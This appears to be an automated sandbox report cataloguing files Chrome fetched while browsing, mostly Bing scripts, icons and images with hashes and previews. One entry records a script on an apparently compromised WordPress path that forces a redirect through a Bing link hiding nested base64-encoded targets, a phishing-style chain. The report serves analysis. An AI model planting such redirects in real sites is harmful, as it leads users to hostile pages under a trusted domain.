                                                                                                      Preview:<script type="text/javascript" nonce="r+0zc9j08TUof5N46+zuzzFqEZ/hVUiAlB6+gcAg628=">//<![CDATA[.sj_evt && sj_evt.bind( "onRALoad", function() { var reportActivityModule = new ModernRewards.ReportActivity({"AnimateHeader":true,"IsAuthenticated":false,"DashboardUrl":"/rewards/dashboard","IsMobileClient":false,"RewardsIncrement":1,"RewardsSessionData":{"IsRewardUser":false,"IsLinkedUser":false,"IsTenantEnabled":false,"IsAadUser":false,"IsTrialUser":false,"TrialUserClaimBalance":0.0,"IsRebatesUser":false,"IsRebatesDeniedUser":true,"Balance":0,"RewardsBalance":0,"GiveBalance":0,"RebatesBalance":0.0,"IsGiveModeOn":false,"PreviousBalance":0,"GoalTrackBalance":200,"IsLevel2":false,"IsOptOut":false,"IsSuspended":false,"ShowAnimation":false,"IsRedirectedFromOldDashboard":false,"ImpressionLifeTimeCount":2,"DailyImpressionHPCount":0,"DailyImpressionSerpCount":1,"VisitedCount":2,"LastVisitTime":"2024-10-30T07:00:00Z","LastAutoOpenFlyoutTime":"0001-01-01T00:00:00","LastRewardsDashboardVisitTimeEpoch
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:ASCII text, with very long lines (1495), with no line terminators
                                                                                                      Category:downloaded
                                                                                                      Size (bytes):1495
                                                                                                      Entropy (8bit):5.2715271964580745
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:7JVCEan7NLRWm8tRWv6lOnRWtFjDPTDRRKXtwBUSbMh0ZkPBoGBYwIlRW3PwTeJF:ANLwHtwWOnwtNjTDGXt0UqMKZYoGBYfc
                                                                                                      MD5:45345F7E8380393CA0C539AE4CFE32BD
                                                                                                      SHA1:292D5F4B184B3FF7178489C01249F37F5CA395A7
                                                                                                      SHA-256:3A40A1FF034448D68D92A75ABABA09BA5F2B71D130F5F6BDF160DCF8851529A9
                                                                                                      SHA-512:2BFD00BF303AD5A1E8413B5EE6A162167605511FEFB8DF61A8F40F80382F5520DF690A53B1058365F1D81562B2668376886D0F829517A642FCD87412801FE987
                                                                                                      Malicious:false
                                                                                                      URL:https://r.bing.com/rp/KS1fSxhLP_cXhInAEknzf1yjlac.js
                                                                                                      Preview:function addRemoveListenersOnAll(){var t=_ge("b_content"),n,i,r;t&&(n=_d.createElement("STYLE"),n.id=styleIdString,n.innerText="#b_results h2>a {padding: 16px 40px 0 6px;margin: -16px -40px 0 -6px;}",_d.head&&_d.head.appendChild(n),i=t.getElementsByClassName("b_ad"),i&&AddRemoveListener(i),r=t.getElementsByClassName("b_algo"),r&&AddRemoveListener(r))}function AddRemoveListener(n){for(var t,i,u=n.length,r=0;r<u;r++)if(t=n[r].getElementsByTagName("CITE"),t&&t.length>0)for(i=0;i<t.length;i++)sj_be(t[i],"click",algo_c)}function mouseMoveAfterTouchHandler(){sj_ue(document,"mousemove",mouseMoveAfterTouchHandler);var n=_d.getElementById(styleIdString);n&&n.parentNode&&n.parentNode.removeChild(n);sj_log("CI.TTC","mouse","started");sj_ue(document,"mousemove",mouseMoveAfterTouchHandler)}function touchStartHandlerAll(n){n.pointerType==="touch"&&(addRemoveListenersOnAll(),sj_log("CI.TTC","touch","started"),sj_ue(document,"pointerdown",touchStartHandlerAll),document.addEventListener("mousemove",mou
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:SVG Scalable Vector Graphics image
                                                                                                      Category:downloaded
                                                                                                      Size (bytes):1391
                                                                                                      Entropy (8bit):4.796412914000846
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:t4LxSdeBU4dxCey0fA53J/S/7/sG5BmefEqrR5GTGOby2NF2E/:+xSUBU4S55Z/aB5BmefEqrRYK6
                                                                                                      MD5:620580657E8A45B4A7B8450B8DA5CD32
                                                                                                      SHA1:922187F6E9192BA43886FB43B70C15735CAFB9E8
                                                                                                      SHA-256:91DE3100632E986CDB6897793EF1B2A8655B15ED4145098CA489856C043D207E
                                                                                                      SHA-512:F3CE71CD92BA2C6ABD6CDEE48F677522439CAD023042D56728E5CB2DED5EC51D1170308FB1524C4A352AC6C5E4E514147D21B99667CCE54CE35A73D91DD27E4B
                                                                                                      Malicious:false
                                                                                                      URL:https://r.bing.com/rp/kiGH9ukZK6Q4hvtDtwwVc1yvueg.svg
                                                                                                      Preview:<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 0 40 40" width="64" height="64">.. <style type="text/css">.. .anim {.. animation-name: blink;.. animation-duration: 1s;.. animation-iteration-count: infinite;.. fill: #05E9F5;.. transition-timing-function: linear;.. }.. @keyframes blink {.. 0% {.. opacity: 0.. }.. 50% {.. opacity: 1.. }.. 75% {.. opacity: 1.. }.. 100% {.. opacity: 1.. }.. }.. .delay1 {.. animation-delay: 0s;.. }.. .delay2 {.. animation-delay: .125s;.. }.. .delay3 {.. animation-delay: .25s;.. }.. .delay4 {.. animation-delay: .375s;.. }.. .delay5 {.. animation-delay: .5s;.. }.. .delay6 {.. animation-delay: .675s;.. }.. .delay7 {.. animation-delay: .75s;.. }.. .delay8 {.. animation-delay: .875s;.. }.. </style>.. <circle class="delay1 anim" cx="20" cy="8" r="3" />.. <circle class="delay5 anim"
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:ASCII text, with very long lines (1937), with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1937
                                                                                                      Entropy (8bit):5.461252594947073
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:qYe3k+th+DNfxe2K9vdjmM0QVV9yTRKcDi4:hskXDuf9FmM0AP0LJ
                                                                                                      MD5:BA408C0E6B5F707319A057CF7CE3B4A7
                                                                                                      SHA1:BE42A50E853218E2F83DE38ACC3640C59225CFAF
                                                                                                      SHA-256:E64BDB46CBCAB956F480728DC1DC3AFB17C2C37F20886721246C101F24C3E03F
                                                                                                      SHA-512:6E64BD4A0F7E21C3551183960D88536D0613E617EE186AB52A2E679FA702B08230BBD2CB292A5602D13407DA7280A362FB46FCB15A40F3F77DE55BAE1C41754C
                                                                                                      Malicious:false
                                                                                                      Preview:var WV=WV||{};(function(n){function u(){if("webVitals"in _w&&(!("isInit"in n)||!n.isInit)&&typeof sj_evt!="undefined"&&typeof sj_be!="undefined"){var t=_w.webVitals;n.onFCP=i(t.onFCP);n.onLCP=i(t.onLCP);n.onCLS=i(t.onCLS);n.onINP=i(t.onINP);n.metrics={};n.isMetricsFrozen=!1;n.isLogged=!1;sj_evt.bind("onP1",f,!0);sj_evt.bind("ajax.requestSent",h)}}function f(){if(!n.isInit){n.onFCP(e);n.onLCP(t);n.onCLS(t);n.onINP(t);n.isInit=!0}}function e(i){n.isFCPCalledOnce||(n.isFCPCalledOnce=!0,sb_st(function(){sj_be(_d,"visibilitychange",o);sj_be(_w,"pagehide",s)},0),t(i))}function o(){"visibilityState"in _d&&_d.visibilityState==="hidden"&&r()}function s(){r()}function h(){r();l()}function c(){n.isLogged=!1;n.metrics={}}function t(t){var i;switch(t.name){case"FCP":i=parseInt(t.value);break;case"LCP":i=parseInt(t.value);break;case"INP":i=parseInt(t.value);break;case"CLS":i=parseFloat(t.value).toFixed(4)}i&&n.metrics[t.name]!=i&&(n.metrics[t.name]=i,n.isLogged=!1)}function r(){!n.isLogged&&!n.isMet
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
                                                                                                      Category:downloaded
                                                                                                      Size (bytes):4286
                                                                                                      Entropy (8bit):1.4428178104858655
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:6:sfyl+rblmboWbol4bolnbsoItwqol0roooooosEol07ooooooooooolxo/lmyosh:suE9gwXZBQ4Nxbk7/GrQV/z1nfx
                                                                                                      MD5:30967B1B52CB6DF18A8AF8FCC04F83C9
                                                                                                      SHA1:AAF67CD84FCD64FB2D8974D7135D6F1E4FC03588
                                                                                                      SHA-256:439B6089E45EF1E0C37EF88764D5C99A3B2752609C4E2AF3376480D7FFCFAF2E
                                                                                                      SHA-512:7CB3C09A81FBD301741E7CF5296C406BAF1C76685D354C54457C87F6471867390A1AEED9F95701EB9361D7DFACCE31AFD1D240841037FC1DE4A120C66C1B088C
                                                                                                      Malicious:false
                                                                                                      URL:https://www.bing.com/sa/simg/favicon-trans-bg-blue-mg.ico
                                                                                                      Preview:...... .... .........(... ...@..... .........%...%........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................n...n...n....................................................................
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:ASCII text, with very long lines (1129), with no line terminators
                                                                                                      Category:downloaded
                                                                                                      Size (bytes):1129
                                                                                                      Entropy (8bit):5.079435667439494
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:PlQiztVfI2TfqkzmGcamP2+SMfpGJYpE4pOGEKebkPtRsBIXOWLp9AYl7qa:NQ6rT29YJYBpGZb0tmetLplea
                                                                                                      MD5:5B3B25FA397E66B3279F4593660F5A8D
                                                                                                      SHA1:E5D52FEE5B28F04DAF2ECFE82E37DFA07977681C
                                                                                                      SHA-256:2EB0F749A518E663AF6828E831D0E437FB38A33D5116E529E93FCF12DBAF91F3
                                                                                                      SHA-512:86437F51C19B55F6D8AED20A62D87BFD69290466A6D3C8157EACC9BA5B6E825A249B8BBA0B133E4BC9A6EF01D70F84EB054397E0C3E046F5216CF59522E919C1
                                                                                                      Malicious:false
                                                                                                      URL:https://r.bing.com/rp/5dUv7lso8E2vLs_oLjffoHl3aBw.js
                                                                                                      Preview:var CaptionClickable;(function(){function t(){for(var i,r=document.querySelectorAll(".b_caption"),u=document.querySelectorAll(".b_imgcap_altitle"),t=0;t<r.length;t++)i=r[t],i&&n(i);for(t=0;t<u.length;t++)i=u[t],i&&n(i)}function n(n){var t=n.previousElementSibling,u,f,e,r,i,o;if(t&&(u=null,t.tagName==="H2"||t.querySelector("h2")?(f=t.tagName==="H2"?t:t.querySelector("h2"),f&&f.querySelector("a")&&(u=f)):t.tagName==="H3"||t.querySelector("h3")?(e=t.tagName==="H3"?t:t.querySelector("h3"),e&&e.querySelector("a")&&(u=e)):u=n.querySelector("h2, h3"),r=n.querySelector(".b_algoSlug"),r||(r=n.querySelector(".b_ctxtsnip")),u&&r&&(i=u.querySelector("a"),i))){if(r.addEventListener("mouseover",function(){i&&(i.style.textDecoration="underline",n.style.cursor="pointer")}),r.addEventListener("mouseout",function(){i&&(i.style.textDecoration="",n.style.cursor="")}),o=r.parentElement,o&&o.tagName==="A")return;r.addEventListener("click",function(){if(i){_w.si_T&&_w.si_T(i.getAttribute("h"));var n=window.g
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:ASCII text, with very long lines (38740), with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):38740
                                                                                                      Entropy (8bit):5.156295325159017
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:384:7nX5LD6HkkHEdz5N9B2b3HGUvavoDbTXGbyswnyD7FJR11pp+CzKdAsT78lLq/uX:7nXx6HrevV11GHX/ulK/Zfm
                                                                                                      MD5:74FAF1ACCB8F72522C7CA3343281A074
                                                                                                      SHA1:7B1BA33A155848525E34976D60CAD0D89724450A
                                                                                                      SHA-256:E131D0DB51A5089562FC2EBA2BFF098F76FAA70A93376747E16EAD3E7B1D98D4
                                                                                                      SHA-512:03A4DD9584D92D07B0A5CD0F505C54E1DEEFF39C3F8B20A5D5DF743FDC0D46DD9B61C5BFEEAB1AAF1CBFB72530896E0A32C981FE289500C4840F01E46F06F8EC
                                                                                                      Malicious:false
                                                                                                      Preview:var SlideExperience;(function(n){function k(n,t,i,r,u,f,e,o,s,h,c,l,v,y,p,w,b,k,d,g,nt,tt,it,rt,ut,ft,et,ot,st,ht,ct,lt){var yt,at,vt,pt;if(lt===void 0&&(lt=!1),yt=new AjaxDataLoader.AjaxDataLoader("SlideExp",f,!0),at=new a(n,t,i,r,u,yt,e,o,s,h,c,l,v,y,p,w,b,k,d,g,nt,tt,it,rt,ut,ft,et,ot,st,ht,ct,lt),at.init(),_w.StateUpdater){if(vt=_w.StateUpdater.restore(at.stateKey),vt==null)return;pt=parseInt(vt);at.slideToIndex(pt,null,!0)}}function h(n){for(var t in o)if(t.indexOf(n)===0)return o[t]}function f(){sj_evt.fire("lazyLdImg")}function d(n,t){var i=h(n);i&&!i.enableAutoStackableSlideCrossFading&&(i.disableAutoSliding(),i.disableAutoSlidingAnimation(),i.slideToIndex(t))}function g(n){var t=h(n),i=[];return t&&(i=t.getVisibleSlidesIndices()),i}function nt(n,t){var i=h(n),r=i.getVisiblePercentage(t);return new l(t,r)}var t="slide_fading",s="hideSlideMask",v="b_autoslidingfade",y="firstslideopaque",p="enable_selecting",e="selected",c="narrpole",r=_G.RTL,i=r?"marginRight":"marginLeft",w=r?"p
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:HTML document, ASCII text, with very long lines (32333)
                                                                                                      Category:dropped
                                                                                                      Size (bytes):50356
                                                                                                      Entropy (8bit):5.483139836017452
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:768:okuL2ym/YIZE2u16tNz14nO2s2jXOO7JUDWvjygz+YI2QFSOc+YIXFWCPP6bzATG:9EbOSjyK4FWCqbwONiYb55dH
                                                                                                      MD5:D8308D378847DB18148FBAB130390E6A
                                                                                                      SHA1:1DBAC88376FACF343824B97F207661652B63B78E
                                                                                                      SHA-256:6FEE4C5A12AF0294CF80083E2A07FAF6EC5502ECAD3FFD698D377D9F2F8A8655
                                                                                                      SHA-512:B8F2D3D00F974E9223E5ECFD8767360685A78569A0436E28E16332A8824AC288671DB3465AEBC75659AAFA0D1ED22DE5E648F89DC6872D4B47634ABD461C2080
                                                                                                      Malicious:false
                                                                                                      Preview:<style type="text/css">#sbiarea,#sbicom{display:none}.hassbi #sbiarea{display:inline-block}#sbiarea{margin:0 0 0 18px}.sbox #sb_form #sbiarea{margin:0}#sb_sbi{display:inline-block;cursor:pointer}img#sbi_b{vertical-align:-2px;height:18px;width:18px}#detailPage #detailheader img#sbi_b,.blue2#miniheader img#sbi_b,.sbox img#sbi_b{vertical-align:-3px}.blue2#miniheader img#sbi_b{vertical-align:-1px}#sbi_b.grayscaled{filter:grayscale(1) brightness(1.4);-webkit-filter:grayscale(1) brightness(1.4)}#sbi_b.grayscaled:hover{filter:grayscale(1) brightness(1);-webkit-filter:grayscale(1) brightness(1)}#sb_sbip[shdlg] #sbi_b{filter:grayscale(0);-webkit-filter:grayscale(0)}#sb_sbip .rms_iac{display:inline-block}#sb_sbip:not(.disableTooltip):hover::before,#sb_sbip.shtip:not(.disableTooltip)::before,#sb_sbip[vptest]::before{bottom:-27px;left:10px;z-index:6}#sb_sbip:not(.disableTooltip):hover::after,#sb_sbip.shtip:not(.disableTooltip)::after,#sb_sbip[vptest]::after{top:40px;left:10px;z-index:4}#hp_contain
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                      Category:downloaded
                                                                                                      Size (bytes):130044
                                                                                                      Entropy (8bit):6.149088079261044
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3072:1Fc1Y1ojjPv9xNwXU6h5gXFsWBFjlXtL8DLgJmV5P6:1Fc1Y1Ablwk0gXFjRdQD8gL6
                                                                                                      MD5:FA24890620D9AF86CAD908634A6D8007
                                                                                                      SHA1:0CBD7865B866889D5F3CD148A70F214ACA395C27
                                                                                                      SHA-256:81BC03A8E49A755BE9E532F7967FE26117FA04953A765A16E203E222A978A45F
                                                                                                      SHA-512:9A7877FDDE100F87FE34D24FFD5F212806ED292D9488542390E7D734BF1DA8F3AD4BB3644C443B3EC9F12D7E9A20DF46F986B13DB559B20BB7747EA77481F78B
                                                                                                      Malicious:false
                                                                                                      URL:https://r.bing.com/rp/DL14ZbhmiJ1fPNFIpw8hSso5XCc.js
                                                                                                      Preview:var __assign=this&&this.__assign||function(){return __assign=Object.assign||function(n){for(var t,r,i=1,u=arguments.length;i<u;i++){t=arguments[i];for(r in t)Object.prototype.hasOwnProperty.call(t,r)&&(n[r]=t[r])}return n},__assign.apply(this,arguments)},__rest=this&&this.__rest||function(n,t){var u={},r;for(var i in n)Object.prototype.hasOwnProperty.call(n,i)&&t.indexOf(i)<0&&(u[i]=n[i]);if(n!=null&&typeof Object.getOwnPropertySymbols=="function")for(r=0,i=Object.getOwnPropertySymbols(n);r<i.length;r++)t.indexOf(i[r])<0&&Object.prototype.propertyIsEnumerable.call(n,i[r])&&(u[i[r]]=n[i[r]]);return u},__spreadArray=this&&this.__spreadArray||function(n,t,i){if(i||arguments.length===2)for(var r=0,f=t.length,u;r<f;r++)!u&&r in t||(u||(u=Array.prototype.slice.call(t,0,r)),u[r]=t[r]);return n.concat(u||Array.prototype.slice.call(t))},__awaiter=this&&this.__awaiter||function(n,t,i,r){function u(n){return n instanceof i?n:new i(function(t){t(n)})}return new(i||(i=Promise))(function(i,f){functi
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=5, xresolution=74, yresolution=82, resolutionunit=2, software=GIMP 2.10.8, datetime=2019:07:31 17:53:43], progressive, precision 8, 160x160, components 3
                                                                                                      Category:downloaded
                                                                                                      Size (bytes):4934
                                                                                                      Entropy (8bit):7.782095567670307
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:96:sHbZoNWsmjRgjXFQvdXNkuz4nicDWk+4Nf6Q2mKwADHfXC7OWn:sFmmjGjWddkuz4nicyktAtmtAbuLn
                                                                                                      MD5:FDA2CEAE0679611937E6E71F701A36AB
                                                                                                      SHA1:75B98D4B8E7142F0F57620296354F61C4C6F3A8F
                                                                                                      SHA-256:B818C1E9B0B46CCCDC158ACA581C3C5F4A9BD3DDA380DA03AF52F43F14F5651E
                                                                                                      SHA-512:904100EBE310AFDF86C2E4C9CBDDC118178D41B45D076BB6077DB8F3BCED8B3CEDF545CE079E39B6F8034C2247FD4C824C0522B6221E3CDC02423AF8EEB9F8A3
                                                                                                      Malicious:false
                                                                                                      URL:https://r.bing.com/rp/dbmNS45xQvD1diApY1T2HExvOo8.jpg
                                                                                                      Preview:......JFIF.....H.H......Exif..II*...............J...........R...(...........1.......Z...2.......f.......H.......H.......GIMP 2.10.8.2019:07:31 17:53:43....C...........................#.%$"."!&+7/&)4)!"0A149;>>>%.DIC<H7=>;...C...........;("(;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;......................................................................................._..Z/9.....AhY...T0*!Eu,..dk.....y. .LP.B..V..m@@f....<uf.......h...)8.2j..*U...<.n....4.B.-....W..^.J..o.{.....z.....".s.,.S...;...^f<.O8,>u.s...n.)....\o..6.{.=#:(.F.;..;1].V.........U5.1..W..g7|r5..==...Hy..h....@...KV.{.l.9.........F.S....N{9.Y..(C.f..u\..&OX..-..N..w\..(.:.1..:ldGW.q.!...mo...e.=........a2..:hkA.....Z.:r}.....Z[...../\...-..A.#..E-K.5..k........]....yQhiAF........cy.[...C..qg.j.Y..Q3.Uh(..X.>kjs..5.....=.M.J.m.Q...FE.m=s..>.WSv..J..42+....V..[....n,.h..5...\.I]...%T.0k.=...h..5.td....].@.\..^.r....d.f..[....k....0*E.U..H.....G...]]Z.M.Y..-..I....%.......................
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:ASCII text, with very long lines (606), with no line terminators
                                                                                                      Category:downloaded
                                                                                                      Size (bytes):606
                                                                                                      Entropy (8bit):5.268639530160161
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:hc2AcBdEcv2Csu+IUhIlaq1YkOcAwI98NyeTgy8XTQHY2:hc2AcBSBZacr98XSDuY2
                                                                                                      MD5:0C2672DC05A52FBFB8E3BC70271619C2
                                                                                                      SHA1:9EDE9AD59479DB4BADB0BA19992620C3174E3E02
                                                                                                      SHA-256:54722CF65AB74A85441A039480691610DF079E6DD3316C452667EFE4A94FFD39
                                                                                                      SHA-512:DD2B3E4438A9DEAA6B306CBC0A50A035D9FE19C6180BC49D2A9D8CDBB2E25D9C6C8C5265C640AC362DC353169727F8C26503E11A8A061A2517A303F61D0CCD3C
                                                                                                      Malicious:false
                                                                                                      URL:https://r.bing.com/rs/6t/x3/nj/nt6a1ZR520utsLoZmSYgwxdOPgI.js?or=w
                                                                                                      Preview:var sj_rra=function(n){var i="/rewardsapp/reportActivity",f=_w.location.search.substring(1),u=window.data_iid,r,t,e;i+=u&&u.length>0?"?IG="+_G.IG+"&IID="+u+"&"+f:"?"+f;r=window.rw_mqs_cg;r&&r.length>0&&(i+="&cg="+r,window.rw_mqs_cg=undefined);_w._H&&_w._H.mkt&&(i+="&src=hp");t=sj_gx();e="url="+escape(n)+"&V=web";t.open("POST",i,!0);t.setRequestHeader("Content-type","application/x-www-form-urlencoded");t.onreadystatechange=function(){t&&t.readyState==4&&t.status==200&&t.responseText&&_w.sj_appHTML&&(sj_appHTML(document.body,t.responseText),sj_evt&&sj_evt.fire("serpThemeUpdatedByRewards"))};t.send(e)}
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:HTML document, ASCII text, with very long lines (402), with no line terminators
                                                                                                      Category:downloaded
                                                                                                      Size (bytes):402
                                                                                                      Entropy (8bit):5.750474988626489
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:6:63GKGKmmHt73qb8if1xXAQ3d+aVomoc5+lGzUfRtEgUCO6gq3XypyCjIBb:udGKxHtub8iffAiddVomoc5+MzU1U0Bb
                                                                                                      MD5:9BF7F9340C12FCB8BE0141C0880C92E8
                                                                                                      SHA1:52A0D7D923C5D1565EDF3EBBF58D84E096F6EE76
                                                                                                      SHA-256:F52DD7FFBE1DDC97F140ED83E9420F952B6C4BC30AC186AD68CA26F338659D8E
                                                                                                      SHA-512:0F9665B8939C8ED58A88AA0CAF8987EDFFEC472F7B268EBC585E70D63EAFAC4833112FC5935CB771931F4D86C1524044D93E633122D5A91AC7B59E20F237997E
                                                                                                      Malicious:false
                                                                                                      URL:https://clinicaaryal.com/wp-admin/maint/404.php
                                                                                                      Preview:<script>window.top.location.href = "https://r.g.bing.com/bam/ac?!&&u=a1aHR0cHM6Ly9yLmcuYmluZy5jb20vYmFtL2FjPyEmJnU9YTFhSFIwY0hNNkx5OXlMbWN1WW1sdVp5NWpiMjB2WW1GdEwyRmpQeUVtSm5VOVlURmhTRkl3WTBoTk5reDVPV3hpUjJ3d1dsZGFNV015YkhaaWFUVjZXVk0xYW1JeU1IWmFSM1JvV1d0amRtRlhOV3RhV0dkMVlVaFNkR0pEVGs1WFZtUlRZa2RPZEdKSGNHaE5SVXB5VjJ4b1MyTkdhM2xrUjNSaFYwVndNRmRXYUZOa2JVcElUMWMxYkZWNlZuRlpha2wzVUZFOVBRPT0=";</script>
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:SVG Scalable Vector Graphics image
                                                                                                      Category:downloaded
                                                                                                      Size (bytes):1101
                                                                                                      Entropy (8bit):4.829151166001716
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:t0S8eLfl954T0u2y3EO1gRcDrIvQaDxijjfscC:vLfRWtPDuQKIjq
                                                                                                      MD5:91CD11CFCCA65CFACE96153268D71F63
                                                                                                      SHA1:E0BE107728D3BF41D8136220DA897D798A2AC60F
                                                                                                      SHA-256:8EE1E6D7A487C38412D7B375AC4A6BD7E47F70858055EEB7957226ADA05544BE
                                                                                                      SHA-512:4367CE147C7FA4590838F23C47819B8954858128336979E28BA116924B92660A7CBDC9A8292C45C5F26FF591F423F03DFADCB78A772DBE86AC5FBABF0B4E7711
                                                                                                      Malicious:false
                                                                                                      URL:https://r.bing.com/rp/4L4QdyjTv0HYE2Ig2ol9eYoqxg8.svg
                                                                                                      Preview:<svg focusable="false" width="24px" height="24px" viewBox="0 0 24 24" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">.. <rect fill-opacity="0.2" fill="#000" x="0" y="0" width="24" height="24" rx="2"></rect>.. <g transform="translate(4, 4)">.. <path d="M13.2916881,1.29304814 L7.99395739,6.59077883 L2.69622669,1.29304814 C2.30349711,0.913737214 1.67923378,0.919161894 1.29315522,1.30524045 C0.907076669,1.691319 0.90165199,2.31558234 1.28096291,2.70831192 L6.57869361,8.00604261 L1.28096291,13.3037733 C0.90165199,13.6965029 0.907076669,14.3207662 1.29315522,14.7068448 C1.67923378,15.0929233 2.30349711,15.098348 2.69622669,14.7190371 L7.99395739,9.42130639 L13.2916881,14.7190371 C13.6844177,15.098348 14.308681,15.0929233 14.6947596,14.7068448 C15.0808381,14.3207662 15.0862628,13.6965029 14.7069519,13.3037733 L9.40922117,8.00604261 L14.7069519,2.70831192 C15.0976827,2.31746305 15.0976827,1.683897 14.7069519,1.29304814 C14.316103,0.902317288 13
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                      Category:downloaded
                                                                                                      Size (bytes):198
                                                                                                      Entropy (8bit):4.878337743750241
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:6:2LGXTMzH1MMW6REyRB8q+ApL3YekcHUMCCbn:2Q6H2UB8qR0hgCCbn
                                                                                                      MD5:E3C4A4463B9C8D7DD23E2BC4A7605F2B
                                                                                                      SHA1:D149907E36943ABB1A4F1E1889A3E70E9348707B
                                                                                                      SHA-256:CFB7FA1C682C6EEE2B763B37E002022463CD6435434A16F6335F33FB98F994A6
                                                                                                      SHA-512:3A4E38E4C631D8E845EDBC01C986F73B0368F8049BEEA7A3E8A34BDD5864C34103A48B19749C11B5BCC71FDAA672EF6C42E305E1CC6B37ABEA934766F3DEB068
                                                                                                      Malicious:false
                                                                                                      URL:https://r.bing.com/rp/0UmQfjaUOrsaTx4YiaPnDpNIcHs.js
                                                                                                      Preview:(function(){function n(){sj_evt.fire("fab_vis",t())}function t(){var n=_ge("b_header");return n?_w.pageYOffset>n.offsetHeight:!1}n();sj_be(_w,"scroll",function(){n()});fab_config.shouldTrigger=t})()
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:ASCII text, with very long lines (544), with no line terminators
                                                                                                      Category:downloaded
                                                                                                      Size (bytes):544
                                                                                                      Entropy (8bit):4.772516232892929
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:9pX6gew8RhA+a388RhAo6VB288RhAo6V1qxD:XXFe3cN3Tcjr2Tcj+xD
                                                                                                      MD5:2AC240E28F5C156E62CF65486FC9CA2A
                                                                                                      SHA1:1F143A24D7BC4A1A3D9F91F49F2E1BA2B1C3D487
                                                                                                      SHA-256:4325982915D0A661F3F0C30C05EB11A94CB56736D448FDC0313143818741FAA3
                                                                                                      SHA-512:CB90CF76CD9DC16829A3FF12BE5274BD26A94097AD036F199151F1C88534A15BBB8F8DAFDD699E51DF5C38E73C925C00728F807B20C0B097A5842963525BAF4B
                                                                                                      Malicious:false
                                                                                                      URL:https://r.bing.com/rp/HxQ6JNe8Sho9n5H0ny4borHD1Ic.js
                                                                                                      Preview:var Orientation;(function(n){function f(n){var f=_w.innerWidth,e;i&&(e=window.matchMedia("(orientation: portrait)"),e.addListener(function(t){_w.innerWidth!=f&&(f=_w.innerWidth,n(!t.matches))}));t&&sj_be(_w,u,function(){_w.innerWidth!=f&&(f=_w.innerWidth,n(_w.innerWidth>_w.innerHeight))});i||t||r||sb_si(function(){_w.innerWidth!=f&&(f=_w.innerWidth,n(_w.innerWidth>_w.innerHeight))},1e3)}var i="matchMedia"in _w,t="onorientationchange"in _w,r="onresize"in _w,u=t?"orientationchange":"resize";n.onOrientation=f})(Orientation||(Orientation={}))
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:SVG Scalable Vector Graphics image
                                                                                                      Category:downloaded
                                                                                                      Size (bytes):726
                                                                                                      Entropy (8bit):4.636787858533541
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:tbH41nlcWYiB1+Xl0ML2t1iOfEmmgaUEUZQ6nMAIPWSxs4yPISEIe9t8aayPISEx:t741nTYifqLL2+O7mgaxSQ6MFnE3nkO
                                                                                                      MD5:6601E4A25AB847203E1015B32514B16C
                                                                                                      SHA1:282FE75F6FED3CFC85BD5C3544ADB462ED45C839
                                                                                                      SHA-256:6E5D3FFF70EEC85FF6D42C84062076688CB092A3D605F47260DBBE6B3B836B21
                                                                                                      SHA-512:305C325EAD714D7BCBD25F3ACED4D7B6AED6AE58D7D4C2F2DFFCE3DFDEB0F427EC812639AD50708EA08BC79E4FAD8AC2D9562B142E0808936053715938638B7C
                                                                                                      Malicious:false
                                                                                                      URL:https://r.bing.com/rp/KC_nX2_tPPyFvVw1RK20Yu1FyDk.svg
